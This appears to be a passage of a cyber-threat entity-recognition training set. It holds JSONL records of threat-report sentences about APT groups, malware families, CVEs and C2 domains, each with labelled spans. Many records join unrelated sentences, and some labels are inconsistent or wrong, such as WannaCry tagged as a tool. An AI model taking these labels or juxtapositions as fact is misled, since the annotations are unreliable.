Tick Group Continues Attacks .", "spans": {"SYSTEM: Google Play": [[99, 110]], "SYSTEM: Facebook": [[113, 121]], "SYSTEM: WhatsApp": [[124, 132]], "SYSTEM: Chrome": [[135, 141]], "SYSTEM: Skype": [[144, 149]], "SYSTEM: Instagram": [[152, 161]], "SYSTEM: Twitter": [[166, 173]], "MALWARE: Honeycomb": [[180, 189]], "THREAT_ACTOR: Tick": [[409, 413]]}, "info": {"id": "cyberner_stix_train_007820", "source": "cyberner_stix_train"}} {"text": "When using email scams , SilverTerrier actors preferred to use large target audiences , which maximized the likelihood of success with very little risk . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies .", "spans": {"THREAT_ACTOR: SilverTerrier actors": [[25, 45]], "MALWARE: Epic Turla": [[175, 185]], "ORGANIZATION: embassies": [[264, 273]]}, "info": {"id": "cyberner_stix_train_007821", "source": "cyberner_stix_train"}} {"text": "] 711231 [ . APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . This campaign has been discussed at a high level by other researchers publicly . None LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": {"THREAT_ACTOR: APT28": [[13, 18]], "VULNERABILITY: Flash exploits": [[62, 76]], "TOOL: Carberp": [[94, 101]], "TOOL: JHUHUGIT downloaders": [[108, 128]], "TOOL: LIGHTWORK": [[247, 256]], "TOOL: disruption tool": [[262, 277]], "TOOL: C++": [[289, 292]]}, "info": {"id": "cyberner_stix_train_007822", "source": "cyberner_stix_train"}} {"text": "Svpeng does this to check if the cards from these banks are attached to the number of the infected phone and to find out the account balance . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including government institutions . 
Winnti : C&C : w[org_name].dnslookup.services : 443 . Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": {"MALWARE: Svpeng": [[0, 6]], "TOOL: Epic Turla": [[164, 174]], "ORGANIZATION: government institutions": [[253, 276]], "THREAT_ACTOR: Winnti": [[279, 285]], "TOOL: C&C": [[288, 291]], "URL: w[org_name].dnslookup.services": [[294, 324]]}, "info": {"id": "cyberner_stix_train_007823", "source": "cyberner_stix_train"}} {"text": "COBALT GYPSY 's continued social media use reinforces the importance of recurring social engineering training . we identified two methods to deliver the KerrDown downloader to targets .", "spans": {"THREAT_ACTOR: COBALT GYPSY": [[0, 12]], "ORGANIZATION: social media": [[26, 38]], "ORGANIZATION: social engineering": [[82, 100]], "FILEPATH: KerrDown": [[153, 161]]}, "info": {"id": "cyberner_stix_train_007824", "source": "cyberner_stix_train"}} {"text": "] com . If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc . Upon installation , the malware starts communicating with one of its C&C servers . 
We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": {"TOOL: C&C": [[266, 269]], "MALWARE: SocGholish": [[342, 352]]}, "info": {"id": "cyberner_stix_train_007825", "source": "cyberner_stix_train"}} {"text": "GlobeImposter is another ransomware strain that saw relatively small-scale distribution until TA505 began including it in malicious spam campaigns at the end of July 2017 .", "spans": {"MALWARE: GlobeImposter": [[0, 13]], "THREAT_ACTOR: TA505": [[94, 99]]}, "info": {"id": "cyberner_stix_train_007826", "source": "cyberner_stix_train"}} {"text": "This is most probably how the application spreads . Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others . The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems .", "spans": {"ORGANIZATION: Symantec": [[52, 60]], "MALWARE: Starloader files": [[83, 99]], "MALWARE: AdobeUpdate.exe": [[112, 127]], "MALWARE: AcrobatUpdate.exe": [[130, 147]], "MALWARE: INTELUPDATE.EXE": [[154, 169]], "THREAT_ACTOR: Leafminer": [[189, 198], [240, 249]], "TOOL: email": [[265, 270]]}, "info": {"id": "cyberner_stix_train_007827", "source": "cyberner_stix_train"}} {"text": "As with many other attackers who use spear-phishing to infect victims , Scarlet Mimic makes heavy use of \" decoy \" files . 
The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts .", "spans": {"THREAT_ACTOR: attackers": [[19, 28]], "THREAT_ACTOR: Scarlet Mimic": [[72, 85]], "ORGANIZATION: defectors": [[201, 210]]}, "info": {"id": "cyberner_stix_train_007828", "source": "cyberner_stix_train"}} {"text": "Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.exe :", "spans": {"FILEPATH: Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.exe": [[0, 56]]}, "info": {"id": "cyberner_stix_train_007829", "source": "cyberner_stix_train"}} {"text": "Please install the app immediately to avoid blocking your account . In one of the more recent campaigns on March 27 , 2019 , the threat actors targeted the Sweden-based consulting firm Cafax . The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm .", "spans": {"THREAT_ACTOR: threat actors": [[129, 142]], "ORGANIZATION: Cafax": [[185, 190]], "THREAT_ACTOR: Poseidon Group": [[314, 328]]}, "info": {"id": "cyberner_stix_train_007830", "source": "cyberner_stix_train"}} {"text": "Usually , this message targets four or five people at a time . PwC UK has been engaged in supporting investigations linked to APT10 compromises . OceanLotus : kermacrescen.com 7244 . 
Not only can email accounts contain access to sensitive data , they can provide an even more convincing persona that is used to execute BEC campaigns impersonating other users to further collect credentials and potentially gain access to other systems .", "spans": {"ORGANIZATION: PwC UK": [[63, 69]], "THREAT_ACTOR: APT10": [[126, 131]], "THREAT_ACTOR: OceanLotus": [[146, 156]], "DOMAIN: kermacrescen.com": [[159, 175]]}, "info": {"id": "cyberner_stix_train_007831", "source": "cyberner_stix_train"}} {"text": "Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed .", "spans": {"MALWARE: Nidiran": [[33, 40]], "FILEPATH: .tmp": [[125, 129]]}, "info": {"id": "cyberner_stix_train_007832", "source": "cyberner_stix_train"}} {"text": "Lookout uncovered nine secondary payload applications : * These apps have not been previously reported and were discovered using data from the Lookout global sensor network , which collects app and device information from over 100 million sensors to provide researchers and customers with a holistic look at the mobile threat ecosystem today . In early 2018 , multiple media claimed that Turla operators used mail attachments to control infected machines . These 2 values , ServiceDll and ServiceDllUnloadOnStop are needed for services that run in a shared process . Postintrusion activities include lateral movement , as well as data collection and exfiltration via browserdata theft and a keylogger .", "spans": {"ORGANIZATION: Lookout": [[0, 7], [143, 150]], "ORGANIZATION: media": [[369, 374]], "TOOL: ServiceDll": [[474, 484]], "TOOL: ServiceDllUnloadOnStop": [[489, 511]]}, "info": {"id": "cyberner_stix_train_007833", "source": "cyberner_stix_train"}} {"text": "] today svc [ . From the configuration it can be determined that the company was running F-Secure Antivirus and Mofang registered the domain to not appear suspicious . 
Backdoor.APT.Ixeshe : Microsoft reported the exploitation occurred together and is linked to a single group of actors tracked as “ HAFNIUM ” , a group that has previously targeted the US - based defense companies , law firms , infectious disease researchers , and think tanks .", "spans": {"TOOL: F-Secure Antivirus": [[89, 107]], "TOOL: Mofang": [[112, 118]], "FILEPATH: Backdoor.APT.Ixeshe": [[168, 187]], "ORGANIZATION: Microsoft": [[190, 199]], "THREAT_ACTOR: HAFNIUM": [[299, 306]], "ORGANIZATION: US - based defense companies": [[352, 380]], "ORGANIZATION: law firms": [[383, 392]], "ORGANIZATION: infectious disease researchers": [[395, 425]], "ORGANIZATION: think tanks": [[432, 443]]}, "info": {"id": "cyberner_stix_train_007834", "source": "cyberner_stix_train"}} {"text": "THREAT ANALYSIS Initial Access Though EventBot is not currently on the Google Play Store , we were able to find several icons EventBot is using to masquerade as a legitimate application . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . 
Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 .", "spans": {"MALWARE: EventBot": [[38, 46], [126, 134]], "SYSTEM: Google Play": [[71, 82]], "ORGANIZATION: Kaspersky Lab": [[188, 201]], "VULNERABILITY: Microsoft Office exploits": [[225, 250]], "MALWARE: Exploit.MSWord.CVE-2010-333": [[298, 325]], "MALWARE: Exploit.Win32.CVE-2012-0158": [[328, 355]], "THREAT_ACTOR: Lotus Blossom": [[358, 371]], "VULNERABILITY: exploit": [[390, 397]], "VULNERABILITY: CVE-2014-6332": [[398, 411]], "MALWARE: Emissary Trojan": [[444, 459]]}, "info": {"id": "cyberner_stix_train_007835", "source": "cyberner_stix_train"}} {"text": "The name of the window is Spark4.2 .", "spans": {"MALWARE: Spark4.2": [[26, 34]]}, "info": {"id": "cyberner_stix_train_007836", "source": "cyberner_stix_train"}} {"text": "This moniker is linked to a Russia based person active in Russian information security communities since at least 2011 .", "spans": {}, "info": {"id": "cyberner_stix_train_007837", "source": "cyberner_stix_train"}} {"text": "Release_Time : 2018-02-28", "spans": {}, "info": {"id": "cyberner_stix_train_007838", "source": "cyberner_stix_train"}} {"text": "Two recurring characteristics of the Sofacy group that we keep seeing in its attacks are speed and the use of multi-backdoor packages for extreme resilience .", "spans": {"THREAT_ACTOR: Sofacy": [[37, 43]]}, "info": {"id": "cyberner_stix_train_007839", "source": "cyberner_stix_train"}} {"text": "samples called out to an additional command and control domain , stikerscloud.com .", "spans": {"DOMAIN: stikerscloud.com": [[65, 81]]}, "info": {"id": "cyberner_stix_train_007840", "source": "cyberner_stix_train"}} {"text": "If any of these conditions is true , the application does not continue to execute the malicious flow . 
FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 . The second group , known as DragonOK , targets high-tech and manufacturing companies in Japan and Taiwan .", "spans": {"ORGANIZATION: FireEye": [[103, 110]], "VULNERABILITY: CVE-2017-10271": [[182, 196]], "THREAT_ACTOR: DragonOK": [[298, 306]], "ORGANIZATION: high-tech": [[317, 326]], "ORGANIZATION: manufacturing companies": [[331, 354]]}, "info": {"id": "cyberner_stix_train_007841", "source": "cyberner_stix_train"}} {"text": "The payload dropped to the system ( SHA256 : 6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a ) is a UPX packed Zebrocy variant written in the Delphi language .", "spans": {"FILEPATH: 6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a": [[45, 109]], "TOOL: UPX": [[117, 120]], "MALWARE: Zebrocy": [[128, 135]], "TOOL: Delphi": [[159, 165]]}, "info": {"id": "cyberner_stix_train_007842", "source": "cyberner_stix_train"}} {"text": "After the infection stage , criminals move laterally with the help of legitimate and pentesting tools , stealing passwords from their initial victims ( entry point ) to gain access to the computers within the organization that have access to money transactions . Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs .", "spans": {"ORGANIZATION: CTU": [[291, 294]], "THREAT_ACTOR: TG-3390": [[319, 326]], "ORGANIZATION: political intelligence": [[428, 450]], "ORGANIZATION: governments": [[456, 467]]}, "info": {"id": "cyberner_stix_train_007843", "source": "cyberner_stix_train"}} {"text": "We believe that these industries have also been targeted as part of a larger supply-chain attack in order for Orangeworm to get access to their intended victims related to healthcare . 
From September 2016 through late November 2016 , a threat actor group used both the Trochilus RAT and a newly idenfied RAT we've named MoonWind to target organizations in Thailand , including a utility organization .", "spans": {"ORGANIZATION: healthcare": [[172, 182]], "MALWARE: Trochilus RAT": [[269, 282]], "MALWARE: RAT": [[304, 307]], "MALWARE: MoonWind": [[320, 328]], "ORGANIZATION: utility organization": [[379, 399]]}, "info": {"id": "cyberner_stix_train_007844", "source": "cyberner_stix_train"}} {"text": "2015–2016 Starting from mid-2015 , the Trojan began using the AES algorithm to encrypt data communicated between the infected device and the C & C : Also starting with the same version , data is sent in a POST request to the relative address with the format “ / [ number ] ” ( a pseudo-randomly generated number in the range 0–9999 ) . WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more .", "spans": {"TOOL: WannaCry": [[336, 344]], "MALWARE: .WCRY": [[383, 388]], "THREAT_ACTOR: Lazarus": [[520, 527]], "ORGANIZATION: enterprises": [[622, 633]], "THREAT_ACTOR: attackers": [[645, 654]]}, "info": {"id": "cyberner_stix_train_007845", "source": "cyberner_stix_train"}} {"text": "The source process looks at its own memory to calculate the offset between the beginning of the libc library and the mmap address . The attacks were initially discovered while investigating a phishing attack that targeted political figures in the MENA region . BLACKCOFFEE supports an initial set of fifteen commands , including creating a reverse shell , uploading and downloading files , and enumerating files and processes . 
The attackers left a small clue in the code , in the form of the number 666 ( 0x29A hex ) before one of the decryption subroutines : • By analysing the logs from the command servers , we have observed 59 unique victims in 23 countries : For the detailed analysis and information on how to protect against the attack , please read :", "spans": {"ORGANIZATION: political": [[222, 231]], "MALWARE: BLACKCOFFEE": [[261, 272]], "THREAT_ACTOR: attackers": [[432, 441]], "SYSTEM: the command servers": [[590, 609]]}, "info": {"id": "cyberner_stix_train_007846", "source": "cyberner_stix_train"}} {"text": "A review of the bit.ly statistics for these campaigns shows that they were at least as effective in driving end-user clicks as the Bank Austria campaign analyzed above . A number of the CIA's electronic attack methods are designed for physical proximity . Deep Panda also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion .", "spans": {"SYSTEM: Bank Austria": [[131, 143]], "THREAT_ACTOR: CIA's": [[186, 191]], "THREAT_ACTOR: Deep Panda": [[256, 266]], "THREAT_ACTOR: Black Vine": [[295, 305]], "ORGANIZATION: Anthem": [[358, 364]]}, "info": {"id": "cyberner_stix_train_007847", "source": "cyberner_stix_train"}} {"text": "Targets held the following titles :", "spans": {}, "info": {"id": "cyberner_stix_train_007848", "source": "cyberner_stix_train"}} {"text": "After execution it takes care of restoring the original KernelCallbackTable . We present the connection between Behzad Mesri , an Iranian national recently indicted for his involvement in hacking HBO , and Charming Kitten . The shellcode then proceeds to execute the payload DLL’s entry point . 
It also reveals direct links to secure[.]66[.]to and zhu[.]vn , both of which also belong to Hack520 and contains his personal blog .", "spans": {"THREAT_ACTOR: Behzad Mesri": [[112, 124]], "THREAT_ACTOR: Charming Kitten": [[206, 221]], "THREAT_ACTOR: Hack520": [[388, 395]]}, "info": {"id": "cyberner_stix_train_007849", "source": "cyberner_stix_train"}} {"text": "The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell's 1984 , but Weeping Angel , developed by the CIA's Embedded Devices Branch (EDB) , which infests smart TVs , transforming them into covert microphones , is surely its most emblematic realization . Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor .", "spans": {"TOOL: Weeping Angel": [[111, 124]], "THREAT_ACTOR: CIA's": [[144, 149]], "TOOL: smart TVs": [[196, 205]], "VULNERABILITY: exploit": [[308, 315]], "SYSTEM: Linux": [[389, 394], [439, 444]]}, "info": {"id": "cyberner_stix_train_007850", "source": "cyberner_stix_train"}} {"text": "Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild . 
As detailed in the previous section , this malware is able to manipulate and exfiltrate emails .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[0, 13]], "VULNERABILITY: CVE-2014-6332": [[35, 48]], "TOOL: emails": [[180, 186]]}, "info": {"id": "cyberner_stix_train_007851", "source": "cyberner_stix_train"}} {"text": "ONIONDUKE : First known activity February 2013 , Most recent known activity Spring 2015 , C&C communication methods HTTP(S) , Twitter ( backup ) , Known toolset components Dropper , Loader , Multiple modular core components , Information stealer , Distributed Denial of Service ( DDoS ) module , Password stealing module , Information gathering module , Social network spamming module .", "spans": {"MALWARE: ONIONDUKE": [[0, 9]], "TOOL: C&C": [[90, 93]], "TOOL: Twitter": [[126, 133]], "TOOL: Dropper": [[172, 179]], "TOOL: Loader": [[182, 188]], "TOOL: Multiple modular": [[191, 207]], "TOOL: Information stealer": [[226, 245]], "TOOL: Distributed Denial of Service": [[248, 277]], "TOOL: DDoS": [[280, 284]]}, "info": {"id": "cyberner_stix_train_007852", "source": "cyberner_stix_train"}} {"text": "Analysis of the malicious iOS profile also revealed further connections , as the profile can also be downloaded from a website that FakeSpy deployed early this year . However , three themes in APT28 's targeting clearly reflects areas of specific interest to an Eastern European government , most likely the Russian government . In this case, the content net user is written to . The core module has a lot of functionality that gives the attacker full control of the victim machine .", "spans": {"SYSTEM: iOS": [[26, 29]], "MALWARE: FakeSpy": [[132, 139]], "THREAT_ACTOR: APT28": [[193, 198]], "ORGANIZATION: government": [[279, 289]], "THREAT_ACTOR: attacker": [[438, 446]]}, "info": {"id": "cyberner_stix_train_007853", "source": "cyberner_stix_train"}} {"text": "After an app is installed , the ad service pays the attacker . 
REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japanese organizations such as government agencies ( including defense ) as well as those in biotechnology , electronics manufacturing , and industrial chemistry . . An additional field of interest in the XPdb was the exec_cdhash , which contains the cdhash , or Code Directory hash , of the executed binaries .", "spans": {"THREAT_ACTOR: REDBALDKNIGHT": [[63, 76]], "THREAT_ACTOR: BRONZE BUTLER": [[93, 106]], "THREAT_ACTOR: Tick": [[111, 115]], "THREAT_ACTOR: cyberespionage group": [[123, 143]], "ORGANIZATION: government agencies": [[191, 210]], "ORGANIZATION: defense": [[223, 230]], "ORGANIZATION: biotechnology": [[253, 266]], "ORGANIZATION: electronics manufacturing": [[269, 294]], "ORGANIZATION: industrial chemistry": [[301, 321]]}, "info": {"id": "cyberner_stix_train_007854", "source": "cyberner_stix_train"}} {"text": "The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report .", "spans": {"MALWARE: DeltaCharlie": [[4, 16]], "TOOL: bot": [[22, 25]], "ORGANIZATION: Novetta": [[53, 60]]}, "info": {"id": "cyberner_stix_train_007855", "source": "cyberner_stix_train"}} {"text": "Technical Analysis The repackaged applications are embedded with malicious code , which can be found in the com.golf package . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . We have seen two types of documents sent to victims in these spear phishing campaigns . 
The attackers may also want to use source code stolen from the game companies so it can be deployed in rogue servers offering pirated versions of the games .", "spans": {"VULNERABILITY: Flash Player exploit": [[162, 182]], "VULNERABILITY: CVE-2016-4117": [[185, 198]], "THREAT_ACTOR: attackers": [[336, 345]]}, "info": {"id": "cyberner_stix_train_007856", "source": "cyberner_stix_train"}} {"text": "Between October 2015 and May 2016 , CTU researchers analyzed 8,909 Bitly links that targeted 3,907 individual Gmail accounts and corporate and organizational email accounts that use Gmail as a service .", "spans": {"ORGANIZATION: CTU": [[36, 39]], "TOOL: Bitly": [[67, 72]], "TOOL: Gmail": [[110, 115], [182, 187]], "TOOL: email": [[158, 163]]}, "info": {"id": "cyberner_stix_train_007857", "source": "cyberner_stix_train"}} {"text": "FireEye HX Exploit Guard is a behavior-based solution that is not affected by the tricks used here .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "TOOL: HX Exploit Guard": [[8, 24]], "TOOL: behavior-based solution": [[30, 53]]}, "info": {"id": "cyberner_stix_train_007858", "source": "cyberner_stix_train"}} {"text": "If the attackers are attempting to compromise persons involved in SEC filings due to their information access , they may ultimately be pursuing securities fraud or other investment abuse . The targets were similar to a 2015 TG-4127 campaign — individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. 
and Europe , individuals working in the defense and government supply chain , and authors and journalists — but also included email accounts linked to the November 2016 United States presidential election .", "spans": {"THREAT_ACTOR: attackers": [[7, 16]], "ORGANIZATION: military": [[315, 323]], "ORGANIZATION: government personnel": [[328, 348]], "ORGANIZATION: defense": [[401, 408]], "ORGANIZATION: government": [[413, 423]], "ORGANIZATION: authors": [[443, 450]], "ORGANIZATION: journalists": [[455, 466]]}, "info": {"id": "cyberner_stix_train_007859", "source": "cyberner_stix_train"}} {"text": "In addition to the new AZZY backdoors with side-DLL for C&C , we observed a new set of data-theft modules deployed against victims by the Sofacy group .", "spans": {"MALWARE: AZZY backdoors": [[23, 37]], "TOOL: side-DLL": [[43, 51]], "TOOL: C&C": [[56, 59]], "THREAT_ACTOR: Sofacy": [[138, 144]]}, "info": {"id": "cyberner_stix_train_007860", "source": "cyberner_stix_train"}} {"text": "If the phone is attached to a bank card , commands are sent from the C & C server with instructions to transfer money from the user ’ s bank account to his/her mobile account . Turla all uses an encrypted container to store the malware 's components and configuration and they also log their actions in a file . Middle Eastern hacking group is using FinFisher malware to conduct international espionage . Looking at the motivations of hackers and cybercriminals is just one possible way to look at how we can dictate our cybersecurity priorities .", "spans": {"THREAT_ACTOR: Turla": [[177, 182]], "TOOL: encrypted container": [[195, 214]], "MALWARE: FinFisher": [[350, 359]], "THREAT_ACTOR: hackers": [[435, 442]], "THREAT_ACTOR: cybercriminals": [[447, 461]]}, "info": {"id": "cyberner_stix_train_007861", "source": "cyberner_stix_train"}} {"text": "Then , the APK is installed as system application and registers listener on USER_PRESENT event . 
According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . Most targets are from the Middle East : Israel , Egypt , Saudi Arabia , United Arab Emirates and Iraq .", "spans": {"ORGANIZATION: FireEye": [[110, 117]], "THREAT_ACTOR: attackers": [[124, 133]], "VULNERABILITY: Microsoft Office vulnerabilities": [[201, 233]], "TOOL: LOWBALL": [[284, 291]]}, "info": {"id": "cyberner_stix_train_007862", "source": "cyberner_stix_train"}} {"text": "SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker’s server when the malicious documents were run . The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild .", "spans": {"THREAT_ACTOR: SectorJ04": [[0, 9]], "THREAT_ACTOR: attacker’s": [[130, 140]], "MALWARE: Lambert family malware": [[207, 229]], "ORGANIZATION: FireEye": [[280, 287]], "VULNERABILITY: zero day": [[310, 318]], "VULNERABILITY: exploit": [[319, 326]], "VULNERABILITY: CVE-2014-4148": [[329, 342]]}, "info": {"id": "cyberner_stix_train_007863", "source": "cyberner_stix_train"}} {"text": "After conveniently granting itself additional privileges and securing its persistence on the device , Cerberus registers the infected device in the botnet and waits for commands from the C2 server while also being ready to perform overlay attacks . They mainly utilize spam email to deliver their backdoor to the infected system that can perform additional commands from the attacker’s server . 
A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": {"MALWARE: Cerberus": [[102, 110]], "THREAT_ACTOR: attacker’s": [[375, 385]], "THREAT_ACTOR: BlackOasis group": [[425, 441]], "VULNERABILITY: zero-day": [[511, 519]], "VULNERABILITY: exploit": [[520, 527]], "THREAT_ACTOR: Gamma Group": [[653, 664]]}, "info": {"id": "cyberner_stix_train_007864", "source": "cyberner_stix_train"}} {"text": "As part of our investigations , we were also able to identify and contact one of the attackers to try and gain insights into the motivations behind these attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_007865", "source": "cyberner_stix_train"}} {"text": "The infection begins when a user downloads and installs a Gooligan-infected app on a vulnerable Android device . One group , which we call Cadelle , uses Backdoor.Cadelspy , while the other , which we've named Chafer , uses Backdoor.Remexi and Backdoor.Remexi.B . So the pattern matching function replaces the global variable with 0 . 
3AM is socalled because it appends encrypted files with the extension .threeamtime .", "spans": {"MALWARE: Gooligan-infected": [[58, 75]], "THREAT_ACTOR: group": [[117, 122]], "THREAT_ACTOR: Cadelle": [[139, 146]], "TOOL: Backdoor.Cadelspy": [[154, 171]], "THREAT_ACTOR: Chafer": [[210, 216]], "TOOL: Backdoor.Remexi": [[224, 239]], "TOOL: Backdoor.Remexi.B": [[244, 261]], "MALWARE: 3AM": [[335, 338]]}, "info": {"id": "cyberner_stix_train_007866", "source": "cyberner_stix_train"}} {"text": "In June 2016 , shortly after the DNC ’s announcement , the Guccifer 2.0 persona claimed responsibility for the DNC breach and leaked documents taken from the organization ’s network .", "spans": {"ORGANIZATION: DNC": [[33, 36], [111, 114]], "THREAT_ACTOR: Guccifer": [[59, 67]]}, "info": {"id": "cyberner_stix_train_007867", "source": "cyberner_stix_train"}} {"text": "This led us to believe the two groups were connected , at least to begin with , although it appears they parted ways in 2014 , with the original Miniduke group switching to the CosmicDuke implant .", "spans": {"THREAT_ACTOR: Miniduke": [[145, 153]], "MALWARE: CosmicDuke": [[177, 187]]}, "info": {"id": "cyberner_stix_train_007868", "source": "cyberner_stix_train"}} {"text": "It is now clear that a distinct industry has developed and is becoming more focused on extracting profits , which is clearly evident from the functionality of the malware . We suspect this router was hacked as part of the campaign in order to process the malware 's HTTP requests . We have chosen to keep the name “ Winnti Group ” since it ’s the name first used to identify it , in 2013 , by Kaspersky . 
As we commonly see in the ransomware space , this threat is delivered through a variety of mechanisms which can include phishing and being dropped as secondary payloads from command and control ( C2 ) frameworks like Cobalt Strike .", "spans": {"TOOL: router": [[189, 195]], "THREAT_ACTOR: Winnti Group": [[316, 328]], "ORGANIZATION: Kaspersky": [[393, 402]], "SYSTEM: control ( C2 ) frameworks": [[591, 616]], "SYSTEM: Cobalt Strike": [[622, 635]]}, "info": {"id": "cyberner_stix_train_007869", "source": "cyberner_stix_train"}} {"text": "The filenames across the two variants bear striking similarities .", "spans": {}, "info": {"id": "cyberner_stix_train_007870", "source": "cyberner_stix_train"}} {"text": "Use and configure available firewalls to block attacks .", "spans": {"TOOL: firewalls": [[28, 37]]}, "info": {"id": "cyberner_stix_train_007871", "source": "cyberner_stix_train"}} {"text": "Exfiltrated contact list data sent to the C2 server . The list also includes several hack tools , such as Mimikatz for credential dumping and several compiled python scripts used to locate and compromise other systems on the local network . As the crisis in Syria escalates , FireEye researchers have discovered a threat group , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe .", "spans": {"TOOL: hack tools": [[85, 95]], "TOOL: Mimikatz": [[106, 114]], "TOOL: python scripts": [[159, 173]], "ORGANIZATION: FireEye": [[276, 283]], "THREAT_ACTOR: Ke3chang": [[345, 353]]}, "info": {"id": "cyberner_stix_train_007872", "source": "cyberner_stix_train"}} {"text": "Mobile Malware Evolution : 2013 24 FEB 2014 The mobile malware sector is growing rapidly both technologically and structurally . The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool ( RAT ) . 
The Winnti Group , active since at least 2012 , is responsible for for high-profile supply-chain attacks against the video game and software industries leading to the distribution of trojanized software ( such as CCleaner , ASUS LiveUpdate and multiple video games ) that is then used to compromise more victims . Method , where the code checks one of two values before running encryption logic", "spans": {"TOOL: HyperBro Trojan": [[152, 167]], "TOOL: RAT": [[227, 230]], "THREAT_ACTOR: Winnti Group": [[239, 251]], "MALWARE: trojanized software": [[418, 437]], "TOOL: CCleaner": [[448, 456]], "TOOL: ASUS LiveUpdate": [[459, 474]]}, "info": {"id": "cyberner_stix_train_007873", "source": "cyberner_stix_train"}} {"text": "As news of the DNC breach spread , APT28 was preparing for another set of operations : countering the condemnation that Russia was facing after doping allegations and a threatened blanket ban of the Russian team from the upcoming Rio Games .", "spans": {"ORGANIZATION: DNC": [[15, 18]], "THREAT_ACTOR: APT28": [[35, 40]], "ORGANIZATION: Rio Games": [[230, 239]]}, "info": {"id": "cyberner_stix_train_007874", "source": "cyberner_stix_train"}} {"text": "Screenshot capture ( with the GDI API ) ;", "spans": {"TOOL: GDI": [[30, 33]], "TOOL: API": [[34, 37]]}, "info": {"id": "cyberner_stix_train_007875", "source": "cyberner_stix_train"}} {"text": "The module allows Gooligan to : Steal a user ’ s Google email account and authentication token information Install apps from Google Play and rate them to raise their reputation Install adware to generate revenue Ad servers , which don ’ t know whether an app using its service is malicious or not , send Gooligan the names of the apps to download from Google Play . BlackOasis ' interests span a wide gamut of figures involved in Middle Eastern politics . 
We need to check if the value comes from the result of x * ( x – 1 ) Tools used by the attackers in this campaign included", "spans": {"MALWARE: Gooligan": [[18, 26], [304, 312]], "ORGANIZATION: Google": [[49, 55]], "SYSTEM: Google Play": [[125, 136], [352, 363]], "THREAT_ACTOR: BlackOasis": [[366, 376]], "ORGANIZATION: politics": [[445, 453]], "TOOL: Tools": [[525, 530]], "THREAT_ACTOR: attackers": [[543, 552]]}, "info": {"id": "cyberner_stix_train_007876", "source": "cyberner_stix_train"}} {"text": "This tool also has a heavy reliance on EventHandlers with timers to run its methods in a specific order and potentially increase its evasion capability .", "spans": {}, "info": {"id": "cyberner_stix_train_007877", "source": "cyberner_stix_train"}} {"text": "This method is not unique to HammerDuke , as MiniDuke , OnionDuke , and CozyDuke all support similar use of Twitter ( image 9 , page 18 ) to retrieve links to additional payloads or commands . 2015 : CloudDuke .", "spans": {"MALWARE: HammerDuke": [[29, 39]], "MALWARE: MiniDuke": [[45, 53]], "MALWARE: OnionDuke": [[56, 65]], "MALWARE: CozyDuke": [[72, 80]], "TOOL: Twitter": [[108, 115]], "MALWARE: CloudDuke": [[200, 209]]}, "info": {"id": "cyberner_stix_train_007878", "source": "cyberner_stix_train"}} {"text": "Given the evidence outlined above , CrowdStrike attributes the PUTTER PANDA group to PLA Unit 61486 within Shanghai , China with high confidence . We didn’t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves .", "spans": {"ORGANIZATION: CrowdStrike": [[36, 47]], "THREAT_ACTOR: PUTTER PANDA group": [[63, 81]], "THREAT_ACTOR: Unit 61486": [[89, 99]], "FILEPATH: .NET malware": [[198, 210]], "FILEPATH: Topinambour": [[231, 